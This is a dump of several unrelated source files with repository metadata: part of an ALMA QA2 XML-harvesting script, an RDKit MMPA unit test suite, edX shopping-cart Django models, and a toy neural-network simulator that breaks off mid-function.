import IPython
dataurl="http://www.eso.org/~fstoehr/project_ous_eb_hierarchy.txt"
dataurl2="http://www.eso.org/~fstoehr/ous_eb_qa0status.txt"
raw_input('\nThis requires you download the .aot file from the SCOPS ticket to your local computer. Press ENTER when ready.\n')
user_name = raw_input('> Enter your username: ').strip()
if user_name == 'bkirk':
path_aot = '/users/bkirk/Documents/DataProcessing/AOTpackages'
else:
path_aot = raw_input('> Enter the path to the .aot file (excluding .aot name): ').strip()
name_aot = raw_input('> Enter the name of the .aot file: ').strip()
mous_code = raw_input('> Enter the MOUS of your project: ').strip()
jaws_project = raw_input('> Is this a JAWS project (yes/no)?: ').strip()
manual_project = raw_input('> Is this a manual project (yes/no)?: ').strip()
type_project = raw_input('> Is this a line or continuum project?: ').strip()
mous_code = mous_code.replace("://","___").replace("/","_")
datadict = ReadDataFromWeb(dataurl,dataurl2, mous_code)
project_path = '/lustre/naasc/sciops/qa2/%s/' % user_name
SB_name = datadict['sbnames']
SB_name = SB_name[0].strip('\"')
if type_project == 'continuum':
project_root, proposal_root, xmlns = SetXMLFiles(datadict, user_name, path_aot, name_aot)
XML_dict = HarvestXMLContinuum(project_root, proposal_root, xmlns, SB_name, path_aot, name_aot)
WriteContinuumInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project)
else:
project_root, proposal_root, xmlns = SetXMLFiles(datadict, user_name, path_aot, name_aot)
XML_dict = HarvestXMLLine(project_root, proposal_root, xmlns, SB_name, path_aot, name_aot)
WriteLineInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project)
    print'\nSuccessful XML harvest\n'
if user_name == 'bkirk':
IPython.embed()
#--------------------------------------------------
main()
#--------------------------------------------------
'''
Continuum project failed; tried looking for repBandwidthKMs
Some cubes work, some fail?
-why 100km/s in OT when XML computes 84km/s?
-user input?
-Refine the skyfreq decision (wasn't reported for the high Z project 00853)
-figure out python to read email and kick off imaging/manual staging script
-Number of SPWs and their properties
-already have spw numbers
-already have spw averaging
-calculate smoothing needed
-need to know which Band is observed
-determine MHz/channel (in OT)
-calculate the channels needed to smooth
-IMAGING & MANUAL XML
-parallelize multiple ASDM projects
-downloading of ASDMs (imaging & manual)
-running generateReducScript (manual)
-way to check weights proportion? (first part of scriptforImaging)
-code up QA2 report checks
-run strip instructions - then remove stripinstructions.py
-check for extra casapy and ipython logs
'''
|
bmarshallk/NAASC
|
various_scripts/HarvestAOTXML.py
|
Python
|
gpl-3.0
| 35,241
|
[
"Brian"
] |
20169d9e1c3099f88fe5dcfebaa5336dc1f7fb7595b20a3ef6d4668c0fb51dad
|
from rdkit import RDConfig
import unittest
from rdkit import Chem
from rdkit.Chem import rdMMPA
def natoms(tpl):
return tuple(x.GetNumAtoms() if x is not None else 0 for x in tpl)
class TestCase(unittest.TestCase):
def setUp(self):
pass
def test1(self):
m = Chem.MolFromSmiles('c1ccccc1OC')
frags = rdMMPA.FragmentMol(m)
self.assertEqual(len(frags), 3)
for frag in frags:
self.assertEqual(len(frag), 2)
frags = sorted(frags, key=natoms)
self.assertEqual(frags[0][0], None)
self.assertEqual(frags[1][0], None)
self.assertNotEqual(frags[2][0], None)
self.assertNotEqual(frags[0][1], None)
self.assertNotEqual(frags[1][1], None)
self.assertNotEqual(frags[2][1], None)
self.assertEqual(frags[0][1].GetNumAtoms(), m.GetNumAtoms() + 2)
self.assertEqual(frags[1][1].GetNumAtoms(), m.GetNumAtoms() + 2)
fs = Chem.GetMolFrags(frags[0][1], asMols=True)
self.assertEqual(len(fs), 2)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'c1ccc([*:1])cc1')
self.assertEqual(Chem.MolToSmiles(fs[1], True), 'CO[*:1]')
fs = Chem.GetMolFrags(frags[1][1], asMols=True)
self.assertEqual(len(fs), 2)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'c1ccc(O[*:1])cc1')
self.assertEqual(Chem.MolToSmiles(fs[1], True), 'C[*:1]')
fs = Chem.GetMolFrags(frags[2][0], asMols=True)
self.assertEqual(len(fs), 1)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'O([*:1])[*:2]')
fs = Chem.GetMolFrags(frags[2][1], asMols=True)
self.assertEqual(len(fs), 2)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'c1ccc([*:2])cc1')
self.assertEqual(Chem.MolToSmiles(fs[1], True), 'C[*:1]')
def test2(self):
m = Chem.MolFromSmiles('c1ccccc1OC')
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
self.assertEqual(len(frags), 3)
for frag in frags:
self.assertEqual(len(frag), 2)
frags = sorted(frags)
self.assertEqual(frags[0][0], '')
self.assertEqual(frags[1][0], '')
self.assertNotEqual(frags[2][0], '')
self.assertNotEqual(frags[0][1], '')
self.assertNotEqual(frags[1][1], '')
self.assertNotEqual(frags[2][1], '')
self.assertEqual(frags[0][1], 'CO[*:1].c1ccc([*:1])cc1')
self.assertEqual(frags[1][1], 'C[*:1].c1ccc(O[*:1])cc1')
self.assertEqual(frags[2][0], 'O([*:1])[*:2]')
self.assertEqual(frags[2][1], 'C[*:1].c1ccc([*:2])cc1')
def test3(self):
m = Chem.MolFromSmiles('c1ccccc1OC')
frags = rdMMPA.FragmentMol(m, resultsAsMols=False, pattern='cO')
self.assertEqual(len(frags), 1)
for frag in frags:
self.assertEqual(len(frag), 2)
frags = sorted(frags)
self.assertEqual(frags[0][0], '')
self.assertNotEqual(frags[0][1], '')
self.assertEqual(frags[0][1], 'CO[*:1].c1ccc([*:1])cc1')
def test4(self):
m = Chem.MolFromSmiles('Cc1ccccc1NC(=O)C(C)[NH+]1CCCC1') # ZINC00000051
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
#for frag in sorted(frags):
# print(frag)
cores = set(x[0] for x in frags)
self.assertTrue('C([*:1])([*:2])[*:3]' in cores)
# FIX: this needs to be investigated, it's not currently passing
#self.assertTrue('O=C(N[*:3])C([*:1])[*:2]' in cores)
self.assertEqual(len(frags), 18)
for frag in frags:
self.assertEqual(len(frag), 2)
def test5(self):
m = Chem.MolFromSmiles(
"CC[C@H](C)[C@@H](C(=O)N[C@H]1CSSC[C@H]2C(=O)NCC(=O)N3CCC[C@H]3C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@@H](CSSC[C@@H](C(=O)N[C@H](C(=O)N4CCC[C@H]4C(=O)N[C@H](C(=O)N2)C)CC(=O)N)NC1=O)C(=O)N)CO)Cc5ccc(cc5)O)CCCC[NH3+])N") # ALPHA-CONOTOXIN SI
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
self.assertFalse(len(frags))
frags = rdMMPA.FragmentMol(m, maxCuts=2, maxCutBonds=21, resultsAsMols=False)
self.assertEqual(len(frags), 231)
def test6(self):
m = Chem.MolFromSmiles(
"CC[C@H](C)[C@@H](C(=O)N[C@H]1CSSC[C@H]2C(=O)NCC(=O)N3CCC[C@H]3C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@@H](CSSC[C@@H](C(=O)N[C@H](C(=O)N4CCC[C@H]4C(=O)N[C@H](C(=O)N2)C)CC(=O)N)NC1=O)C(=O)N)CO)Cc5ccc(cc5)O)CCCC[NH3+])N") # ALPHA-CONOTOXIN SI
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
self.assertFalse(len(frags))
frags1 = rdMMPA.FragmentMol(m, minCuts=1, maxCuts=1, maxCutBonds=21,
resultsAsMols=False)
frags2 = rdMMPA.FragmentMol(m, minCuts=2, maxCuts=2, maxCutBonds=21,
resultsAsMols=False)
frags = rdMMPA.FragmentMol(m, maxCuts=2, maxCutBonds=21, resultsAsMols=False)
self.assertEqual(set(frags1+frags2), set(frags))
self.assertEqual(set(frags1).intersection(set(frags2)), set())
def test7(self):
m = Chem.MolFromSmiles("Oc1ccccc1N")
frags1 = rdMMPA.FragmentMol(m, minCuts=1, maxCuts=1, maxCutBonds=21,
resultsAsMols=False)
frags2 = rdMMPA.FragmentMol(m, minCuts=2, maxCuts=2, maxCutBonds=21,
resultsAsMols=False)
frags = rdMMPA.FragmentMol(m, maxCuts=2, maxCutBonds=21, resultsAsMols=False)
self.assertEqual(set(frags1+frags2), set(frags))
def test8(self):
m = Chem.MolFromSmiles('Cc1ccccc1NC(=O)C(C)[NH+]1CCCC1') # ZINC00000051
sm = Chem.MolFromSmarts("[#6+0;!$(*=,#[!#6])]!@!=!#[*]")
matching_atoms = m.GetSubstructMatches(sm)
bonds = []
for a,b in matching_atoms:
bond = m.GetBondBetweenAtoms(a,b)
bonds.append(bond.GetIdx())
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
frags2 = rdMMPA.FragmentMol(m, bonds, resultsAsMols=False)
frags3 = rdMMPA.FragmentMol(m, tuple(bonds), resultsAsMols=False)
self.assertEqual(frags, frags2)
self.assertEqual(frags2, frags3)
def test9(self):
m = Chem.MolFromSmiles("Oc1ccccc1N")
try:
frags1 = rdMMPA.FragmentMol(m, minCuts=1, maxCuts=0, maxCutBonds=21,
resultsAsMols=False)
self.assertTrue(False) # should not get here
except ValueError as e:
self.assertEqual(str(e), "supplied maxCuts is less than minCuts")
try:
frags1 = rdMMPA.FragmentMol(m, minCuts=0, maxCuts=0, maxCutBonds=21,
resultsAsMols=False)
self.assertTrue(False) # should not get here
except ValueError as e:
self.assertEqual(str(e), "minCuts must be greater than 0")
if __name__ == "__main__":
unittest.main()
|
bp-kelley/rdkit
|
Code/GraphMol/MMPA/Wrap/testMMPA.py
|
Python
|
bsd-3-clause
| 6,407
|
[
"RDKit"
] |
975b937d5f460ccc76b6f664d7b47adf58196d0eaff6cfeab15f57c636d2ce00
|
from datetime import datetime
import pytz
import logging
import smtplib
from model_utils.managers import InheritanceManager
from collections import namedtuple
from boto.exception import BotoServerError # this is a super-class of SESError and catches connection errors
from django.dispatch import receiver
from django.db import models
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.utils.translation import ugettext as _
from django.db import transaction
from django.core.urlresolvers import reverse
from xmodule.modulestore.django import modulestore
from xmodule.course_module import CourseDescriptor
from xmodule.modulestore.exceptions import ItemNotFoundError
from course_modes.models import CourseMode
from mitxmako.shortcuts import render_to_string
from student.views import course_from_id
from student.models import CourseEnrollment, unenroll_done
from verify_student.models import SoftwareSecurePhotoVerification
from .exceptions import (InvalidCartItem, PurchasedCallbackException, ItemAlreadyInCartException,
AlreadyEnrolledInCourseException, CourseDoesNotExistException)
log = logging.getLogger("shoppingcart")
ORDER_STATUSES = (
('cart', 'cart'),
('purchased', 'purchased'),
('refunded', 'refunded'),
)
# we need a tuple to represent the primary key of various OrderItem subclasses
OrderItemSubclassPK = namedtuple('OrderItemSubclassPK', ['cls', 'pk']) # pylint: disable=C0103
class Order(models.Model):
"""
This is the model for an order. Before purchase, an Order and its related OrderItems are used
as the shopping cart.
FOR ANY USER, THERE SHOULD ONLY EVER BE ZERO OR ONE ORDER WITH STATUS='cart'.
"""
user = models.ForeignKey(User, db_index=True)
currency = models.CharField(default="usd", max_length=8) # lower case ISO currency codes
status = models.CharField(max_length=32, default='cart', choices=ORDER_STATUSES)
purchase_time = models.DateTimeField(null=True, blank=True)
# Now we store data needed to generate a reasonable receipt
# These fields only make sense after the purchase
bill_to_first = models.CharField(max_length=64, blank=True)
bill_to_last = models.CharField(max_length=64, blank=True)
bill_to_street1 = models.CharField(max_length=128, blank=True)
bill_to_street2 = models.CharField(max_length=128, blank=True)
bill_to_city = models.CharField(max_length=64, blank=True)
bill_to_state = models.CharField(max_length=8, blank=True)
bill_to_postalcode = models.CharField(max_length=16, blank=True)
bill_to_country = models.CharField(max_length=64, blank=True)
bill_to_ccnum = models.CharField(max_length=8, blank=True) # last 4 digits
bill_to_cardtype = models.CharField(max_length=32, blank=True)
# a JSON dump of the CC processor response, for completeness
processor_reply_dump = models.TextField(blank=True)
@classmethod
def get_cart_for_user(cls, user):
"""
Always use this to preserve the property that at most 1 order per user has status = 'cart'
"""
# find the newest element in the db
try:
cart_order = cls.objects.filter(user=user, status='cart').order_by('-id')[:1].get()
except ObjectDoesNotExist:
# if nothing exists in the database, create a new cart
cart_order, _created = cls.objects.get_or_create(user=user, status='cart')
return cart_order
@classmethod
def user_cart_has_items(cls, user):
"""
Returns true if the user (anonymous user ok) has
        a cart with items in it. (Which means it should be displayed.)
"""
if not user.is_authenticated():
return False
cart = cls.get_cart_for_user(user)
return cart.has_items()
@property
def total_cost(self):
"""
Return the total cost of the cart. If the order has been purchased, returns total of
all purchased and not refunded items.
"""
return sum(i.line_cost for i in self.orderitem_set.filter(status=self.status)) # pylint: disable=E1101
def has_items(self):
"""
Does the cart have any items in it?
"""
return self.orderitem_set.exists() # pylint: disable=E1101
def clear(self):
"""
Clear out all the items in the cart
"""
self.orderitem_set.all().delete()
def purchase(self, first='', last='', street1='', street2='', city='', state='', postalcode='',
country='', ccnum='', cardtype='', processor_reply_dump=''):
"""
Call to mark this order as purchased. Iterates through its OrderItems and calls
their purchased_callback
`first` - first name of person billed (e.g. John)
`last` - last name of person billed (e.g. Smith)
`street1` - first line of a street address of the billing address (e.g. 11 Cambridge Center)
`street2` - second line of a street address of the billing address (e.g. Suite 101)
`city` - city of the billing address (e.g. Cambridge)
`state` - code of the state, province, or territory of the billing address (e.g. MA)
`postalcode` - postal code of the billing address (e.g. 02142)
`country` - country code of the billing address (e.g. US)
`ccnum` - last 4 digits of the credit card number of the credit card billed (e.g. 1111)
`cardtype` - 3-digit code representing the card type used (e.g. 001)
`processor_reply_dump` - all the parameters returned by the processor
"""
if self.status == 'purchased':
return
self.status = 'purchased'
self.purchase_time = datetime.now(pytz.utc)
self.bill_to_first = first
self.bill_to_last = last
self.bill_to_city = city
self.bill_to_state = state
self.bill_to_country = country
self.bill_to_postalcode = postalcode
if settings.MITX_FEATURES['STORE_BILLING_INFO']:
self.bill_to_street1 = street1
self.bill_to_street2 = street2
self.bill_to_ccnum = ccnum
self.bill_to_cardtype = cardtype
self.processor_reply_dump = processor_reply_dump
# save these changes on the order, then we can tell when we are in an
# inconsistent state
self.save()
# this should return all of the objects with the correct types of the
# subclasses
orderitems = OrderItem.objects.filter(order=self).select_subclasses()
for item in orderitems:
item.purchase_item()
# send confirmation e-mail
subject = _("Order Payment Confirmation")
message = render_to_string('emails/order_confirmation_email.txt', {
'order': self,
'order_items': orderitems,
'has_billing_info': settings.MITX_FEATURES['STORE_BILLING_INFO']
})
try:
send_mail(subject, message,
settings.DEFAULT_FROM_EMAIL, [self.user.email]) # pylint: disable=E1101
except (smtplib.SMTPException, BotoServerError): # sadly need to handle diff. mail backends individually
log.error('Failed sending confirmation e-mail for order %d', self.id) # pylint: disable=E1101
def generate_receipt_instructions(self):
"""
Call to generate specific instructions for each item in the order. This gets displayed on the receipt
page, typically. Instructions are something like "visit your dashboard to see your new courses".
This will return two things in a pair. The first will be a dict with keys=OrderItemSubclassPK corresponding
to an OrderItem and values=a set of html instructions they generate. The second will be a set of de-duped
html instructions
"""
instruction_set = set([]) # heh. not ia32 or alpha or sparc
instruction_dict = {}
order_items = OrderItem.objects.filter(order=self).select_subclasses()
for item in order_items:
item_pk_with_subclass, set_of_html = item.generate_receipt_instructions()
instruction_dict[item_pk_with_subclass] = set_of_html
instruction_set.update(set_of_html)
return instruction_dict, instruction_set
class OrderItem(models.Model):
"""
This is the basic interface for order items.
Order items are line items that fill up the shopping carts and orders.
Each implementation of OrderItem should provide its own purchased_callback as
a method.
"""
objects = InheritanceManager()
order = models.ForeignKey(Order, db_index=True)
# this is denormalized, but convenient for SQL queries for reports, etc. user should always be = order.user
user = models.ForeignKey(User, db_index=True)
# this is denormalized, but convenient for SQL queries for reports, etc. status should always be = order.status
status = models.CharField(max_length=32, default='cart', choices=ORDER_STATUSES)
qty = models.IntegerField(default=1)
unit_cost = models.DecimalField(default=0.0, decimal_places=2, max_digits=30)
line_desc = models.CharField(default="Misc. Item", max_length=1024)
currency = models.CharField(default="usd", max_length=8) # lower case ISO currency codes
fulfilled_time = models.DateTimeField(null=True)
@property
def line_cost(self):
""" Return the total cost of this OrderItem """
return self.qty * self.unit_cost
@classmethod
def add_to_order(cls, order, *args, **kwargs):
"""
A suggested convenience function for subclasses.
NOTE: This does not add anything to the cart. That is left up to the
subclasses to implement for themselves
"""
# this is a validation step to verify that the currency of the item we
# are adding is the same as the currency of the order we are adding it
# to
currency = kwargs.get('currency', 'usd')
if order.currency != currency and order.orderitem_set.exists():
raise InvalidCartItem(_("Trying to add a different currency into the cart"))
@transaction.commit_on_success
def purchase_item(self):
"""
This is basically a wrapper around purchased_callback that handles
modifying the OrderItem itself
"""
self.purchased_callback()
self.status = 'purchased'
self.fulfilled_time = datetime.now(pytz.utc)
self.save()
def purchased_callback(self):
"""
This is called on each inventory item in the shopping cart when the
purchase goes through.
"""
raise NotImplementedError
def generate_receipt_instructions(self):
"""
This is called on each item in a purchased order to generate receipt instructions.
This should return a list of `ReceiptInstruction`s in HTML string
Default implementation is to return an empty set
"""
return self.pk_with_subclass, set([])
@property
def pk_with_subclass(self):
"""
Returns a named tuple that annotates the pk of this instance with its class, to fully represent
a pk of a subclass (inclusive) of OrderItem
"""
return OrderItemSubclassPK(type(self), self.pk)
@property
def single_item_receipt_template(self):
"""
The template that should be used when there's only one item in the order
"""
return 'shoppingcart/receipt.html'
@property
def single_item_receipt_context(self):
"""
Extra variables needed to render the template specified in
`single_item_receipt_template`
"""
return {}
@property
def additional_instruction_text(self):
"""
Individual instructions for this order item.
Currently, only used for e-mails.
"""
return ''
class PaidCourseRegistration(OrderItem):
"""
This is an inventory item for paying for a course registration
"""
course_id = models.CharField(max_length=128, db_index=True)
mode = models.SlugField(default=CourseMode.DEFAULT_MODE_SLUG)
@classmethod
def contained_in_order(cls, order, course_id):
"""
Is the course defined by course_id contained in the order?
"""
return course_id in [item.paidcourseregistration.course_id
for item in order.orderitem_set.all().select_subclasses("paidcourseregistration")]
@classmethod
@transaction.commit_on_success
def add_to_order(cls, order, course_id, mode_slug=CourseMode.DEFAULT_MODE_SLUG, cost=None, currency=None):
"""
A standardized way to create these objects, with sensible defaults filled in.
Will update the cost if called on an order that already carries the course.
Returns the order item
"""
# First a bunch of sanity checks
try:
course = course_from_id(course_id) # actually fetch the course to make sure it exists, use this to
# throw errors if it doesn't
except ItemNotFoundError:
log.error("User {} tried to add non-existent course {} to cart id {}"
.format(order.user.email, course_id, order.id))
raise CourseDoesNotExistException
if cls.contained_in_order(order, course_id):
log.warning("User {} tried to add PaidCourseRegistration for course {}, already in cart id {}"
.format(order.user.email, course_id, order.id))
raise ItemAlreadyInCartException
if CourseEnrollment.is_enrolled(user=order.user, course_id=course_id):
log.warning("User {} trying to add course {} to cart id {}, already registered"
.format(order.user.email, course_id, order.id))
raise AlreadyEnrolledInCourseException
### Validations done, now proceed
### handle default arguments for mode_slug, cost, currency
course_mode = CourseMode.mode_for_course(course_id, mode_slug)
if not course_mode:
# user could have specified a mode that's not set, in that case return the DEFAULT_MODE
course_mode = CourseMode.DEFAULT_MODE
if not cost:
cost = course_mode.min_price
if not currency:
currency = course_mode.currency
super(PaidCourseRegistration, cls).add_to_order(order, course_id, cost, currency=currency)
item, created = cls.objects.get_or_create(order=order, user=order.user, course_id=course_id)
item.status = order.status
item.mode = course_mode.slug
item.qty = 1
item.unit_cost = cost
item.line_desc = 'Registration for Course: {0}'.format(course.display_name_with_default)
item.currency = currency
order.currency = currency
order.save()
item.save()
log.info("User {} added course registration {} to cart: order {}"
.format(order.user.email, course_id, order.id))
return item
def purchased_callback(self):
"""
When purchased, this should enroll the user in the course. We are assuming that
course settings for enrollment date are configured such that only if the (user.email, course_id) pair is found
in CourseEnrollmentAllowed will the user be allowed to enroll. Otherwise requiring payment
would in fact be quite silly since there's a clear back door.
"""
try:
course_loc = CourseDescriptor.id_to_location(self.course_id)
course_exists = modulestore().has_item(self.course_id, course_loc)
except ValueError:
raise PurchasedCallbackException(
"The customer purchased Course {0}, but that course doesn't exist!".format(self.course_id))
if not course_exists:
raise PurchasedCallbackException(
"The customer purchased Course {0}, but that course doesn't exist!".format(self.course_id))
CourseEnrollment.enroll(user=self.user, course_id=self.course_id, mode=self.mode)
log.info("Enrolled {0} in paid course {1}, paid ${2}"
.format(self.user.email, self.course_id, self.line_cost)) # pylint: disable=E1101
def generate_receipt_instructions(self):
"""
Generates instructions when the user has purchased a PaidCourseRegistration.
Basically tells the user to visit the dashboard to see their new classes
"""
notification = (_('Please visit your <a href="{dashboard_link}">dashboard</a> to see your new enrollments.')
.format(dashboard_link=reverse('dashboard')))
return self.pk_with_subclass, set([notification])
class CertificateItem(OrderItem):
"""
This is an inventory item for purchasing certificates
"""
course_id = models.CharField(max_length=128, db_index=True)
course_enrollment = models.ForeignKey(CourseEnrollment)
mode = models.SlugField()
@receiver(unenroll_done)
def refund_cert_callback(sender, course_enrollment=None, **kwargs):
"""
When a CourseEnrollment object calls its unenroll method, this function checks to see if that unenrollment
occurred in a verified certificate that was within the refund deadline. If so, it actually performs the
refund.
Returns the refunded certificate on a successful refund; else, it returns nothing.
"""
# Only refund verified cert unenrollments that are within bounds of the expiration date
if not course_enrollment.refundable():
return
target_certs = CertificateItem.objects.filter(course_id=course_enrollment.course_id, user_id=course_enrollment.user, status='purchased', mode='verified')
try:
target_cert = target_certs[0]
except IndexError:
log.error("Matching CertificateItem not found while trying to refund. User %s, Course %s", course_enrollment.user, course_enrollment.course_id)
return
target_cert.status = 'refunded'
target_cert.save()
order_number = target_cert.order_id
# send billing an email so they can handle refunding
subject = _("[Refund] User-Requested Refund")
message = "User {user} ({user_email}) has requested a refund on Order #{order_number}.".format(user=course_enrollment.user,
user_email=course_enrollment.user.email,
order_number=order_number)
to_email = [settings.PAYMENT_SUPPORT_EMAIL]
from_email = [settings.PAYMENT_SUPPORT_EMAIL]
try:
send_mail(subject, message, from_email, to_email, fail_silently=False)
except (smtplib.SMTPException, BotoServerError):
            err_str = 'Failed sending email to billing to request a refund for verified certificate (User {user}, Course {course}, CourseEnrollmentID {ce_id}, Order #{order})'
log.error(err_str.format(
user=course_enrollment.user,
course=course_enrollment.course_id,
ce_id=course_enrollment.id,
order=order_number))
return target_cert
@classmethod
@transaction.commit_on_success
def add_to_order(cls, order, course_id, cost, mode, currency='usd'):
"""
Add a CertificateItem to an order
Returns the CertificateItem object after saving
`order` - an order that this item should be added to, generally the cart order
`course_id` - the course that we would like to purchase as a CertificateItem
`cost` - the amount the user will be paying for this CertificateItem
`mode` - the course mode that this certificate is going to be issued for
This item also creates a new enrollment if none exists for this user and this course.
Example Usage:
cart = Order.get_cart_for_user(user)
CertificateItem.add_to_order(cart, 'edX/Test101/2013_Fall', 30, 'verified')
"""
super(CertificateItem, cls).add_to_order(order, course_id, cost, currency=currency)
course_enrollment = CourseEnrollment.get_or_create_enrollment(order.user, course_id)
# do some validation on the enrollment mode
valid_modes = CourseMode.modes_for_course_dict(course_id)
if mode in valid_modes:
mode_info = valid_modes[mode]
else:
raise InvalidCartItem(_("Mode {mode} does not exist for {course_id}").format(mode=mode, course_id=course_id))
item, _created = cls.objects.get_or_create(
order=order,
user=order.user,
course_id=course_id,
course_enrollment=course_enrollment,
mode=mode
)
item.status = order.status
item.qty = 1
item.unit_cost = cost
course_name = course_from_id(course_id).display_name
item.line_desc = _("Certificate of Achievement, {mode_name} for course {course}").format(mode_name=mode_info.name,
course=course_name)
item.currency = currency
order.currency = currency
order.save()
item.save()
return item
def purchased_callback(self):
"""
When purchase goes through, activate and update the course enrollment for the correct mode
"""
try:
verification_attempt = SoftwareSecurePhotoVerification.active_for_user(self.course_enrollment.user)
verification_attempt.submit()
except Exception as e:
log.exception(
"Could not submit verification attempt for enrollment {}".format(self.course_enrollment)
)
self.course_enrollment.change_mode(self.mode)
self.course_enrollment.activate()
@property
def single_item_receipt_template(self):
if self.mode == 'verified':
return 'shoppingcart/verified_cert_receipt.html'
else:
return super(CertificateItem, self).single_item_receipt_template
@property
def single_item_receipt_context(self):
course = course_from_id(self.course_id)
return {
"course_id" : self.course_id,
"course_name": course.display_name_with_default,
"course_org": course.display_org_with_default,
"course_num": course.display_number_with_default,
"course_start_date_text": course.start_date_text,
"course_has_started": course.start > datetime.today().replace(tzinfo=pytz.utc),
}
@property
def additional_instruction_text(self):
return _("Note - you have up to 2 weeks into the course to unenroll from the Verified Certificate option "
"and receive a full refund. To receive your refund, contact {billing_email}. "
"Please include your order number in your e-mail. "
"Please do NOT include your credit card information.").format(
billing_email=settings.PAYMENT_SUPPORT_EMAIL)
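# --- Hedged usage sketch (not part of the original module) -------------------
# Mirrors the CertificateItem docstring example above, but for
# PaidCourseRegistration; the course id and the cart.purchase() call are
# illustrative assumptions, not verbatim API taken from this excerpt.
#
#     cart = Order.get_cart_for_user(user)
#     PaidCourseRegistration.add_to_order(cart, 'edX/Test101/2013_Fall')
#     cart.purchase()  # assumed to trigger purchased_callback() on each item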
|
TsinghuaX/edx-platform
|
lms/djangoapps/shoppingcart/models.py
|
Python
|
agpl-3.0
| 23,513
|
[
"VisIt"
] |
208305a8a810ed23a1f3e72c57f3fde9dbe5b59703924459e0844a919e008691
|
import numpy as np
import random
import json
import math
neuron_decay=0.9
maxneuronsperunit=64
maxaxonsperunit=128
maxunits=10
binary_io=True
bitsize=8
runtime=20
testsize=20
class neuron:
id=-1
myunit=-1
active=False
can_mutate=True
threshold=999
amount=0
decay=neuron_decay
downstream_axons=[]
upstream_axons=[]
    def __init__(self,id,threshold):
        self.id=id
        self.threshold=threshold
        # per-instance axon lists; the class-level lists above would otherwise
        # be shared by every neuron instance
        self.downstream_axons=[]
        self.upstream_axons=[]
def check(self):
global units
if self.amount>=self.threshold and self.active:
for x in self.downstream_axons:
if x>-1:
units[self.myunit].axons[x].fire()
self.amount=self.amount*self.decay
class axon:
id=-1
myunit=-1
active=False
fireamount=0
upstream_neuron=-1
downstream_neuron=-1
def __init__(self,id):
self.id=id
def fire(self):
global units
units[self.myunit].neurons[self.downstream_neuron].amount=units[self.myunit].neurons[self.downstream_neuron].amount+self.fireamount
#print "AXON "+str(self.id)+" IS FIRING WITH "+str(self.fireamount)
return True
class unit:
id=-1
active=False
active_neurons=0
active_axons=0
input_neurons=[]
output_neurons=[]
neurons=[neuron(i,999) for i in range(maxneuronsperunit)]
axons=[axon(i) for i in range(maxaxonsperunit)]
    def __init__(self,id):
        self.id=id
        # per-instance state; without these, all units would share the same
        # neuron/axon objects and I/O lists defined at class level
        self.input_neurons=[]
        self.output_neurons=[]
        self.neurons=[neuron(i,999) for i in range(maxneuronsperunit)]
        self.axons=[axon(i) for i in range(maxaxonsperunit)]
def add_neuron(self,threshold):
a=0
b=-1
while a<maxneuronsperunit:
if self.neurons[a].active==False:
b=a
self.active_neurons=self.active_neurons+1
a=maxneuronsperunit
a=a+1
self.neurons[b].active=True
self.neurons[b].myunit=self.id
self.neurons[b].threshold=threshold
return b
def add_n_neurons(self,n,threshold):
a=0
while a<n:
self.add_neuron(threshold)
a=a+1
def remove_neuron(self,n):
if self.neurons[n].active==True:
self.neurons[n].active=False
self.neurons[n].amount=0
self.neurons[n].threshold=999
self.active_neurons=self.active_neurons-1
def connect(self,a,b,amount):
if self.neurons[a].active and self.neurons[b].active:
c=0
d=0
while c<maxaxonsperunit:
if self.axons[c].active==False:
d=c
c=maxaxonsperunit
c=c+1
self.neurons[a].downstream_axons.append(d)
self.neurons[b].upstream_axons.append(d)
self.axons[d].active=True
self.axons[d].fireamount=amount
self.axons[d].myunit=self.id
self.axons[d].downstream_neuron=b
self.axons[d].upstream_neuron=a
return True
else:
return False
def cycle(self,inputs):
a=0
outputs=[]
#RESET ALL NEURONS BETWEEN CYCLES
for x in self.neurons:
x.amount=0
while a<runtime:
b=0
c=0
while c<len(self.input_neurons) and c<len(inputs):
self.neurons[self.input_neurons[c]].amount=inputs[c]
c=c+1
while b<maxneuronsperunit:
if self.neurons[b].active:
self.neurons[b].check()
b=b+1
#print "RUN CYCLE "+str(a)
a=a+1
def print_neurons(self):
a=0
while a<maxneuronsperunit:
if self.neurons[a].active:
print "NEURON "+str(a)+" AMT: "+str(self.neurons[a].amount)+" / "+str(self.neurons[a].threshold)
a=a+1
print "INPUTS"
for x in self.input_neurons:
print str(x)
print ""
print "OUTPUTS"
for y in self.output_neurons:
print str(y)
def designate_io(self,ins,outs):
a=0
b=0
while b<ins and a<maxneuronsperunit:
if self.neurons[a].active:
self.neurons[a].can_mutate=False
self.neurons[a].decay=1
if binary_io:
self.neurons[a].threshold=1 #IO are BINARY
self.input_neurons.append(a)
b=b+1
a=a+1
c=0
d=a
while c<outs and d<maxneuronsperunit:
if self.neurons[d].active:
self.neurons[d].can_mutate=False
self.neurons[d].decay=1
if binary_io:
self.neurons[d].threshold=1
self.output_neurons.append(d)
c=c+1
d=d+1
if c==ins and b==outs:
return True
else:
return False
def remove_axon(self,n):
if self.axons[n].active:
self.axons[n].active=False
self.axons[n].id=-1
self.axons[n].fireamount=0
u=self.axons[n].upstream_neuron
d=self.axons[n].downstream_neuron
self.axons[n].upstream_neuron=-1
self.axons[n].downstream_neuron=-1
if self.neurons[u].active:
a=0
while a<len(self.neurons[u].downstream_axons):
if self.neurons[u].downstream_axons[a]==n:
self.neurons[u].downstream_axons[a]=-1
a=a+1
if self.neurons[d].active:
b=0
while b<len(self.neurons[d].upstream_axons):
if self.neurons[d].upstream_axons[b]==n:
self.neurons[d].upstream_axons[b]=-1
b=b+1
def change_axon_destination(self,a,d):
if self.axons[a].active:
b=self.axons[a].downstream_neuron
h=0
while h<len(self.neurons[b].upstream_axons):
if self.neurons[b].upstream_axons[h]==a:
self.neurons[b].upstream_axons[h]=-1
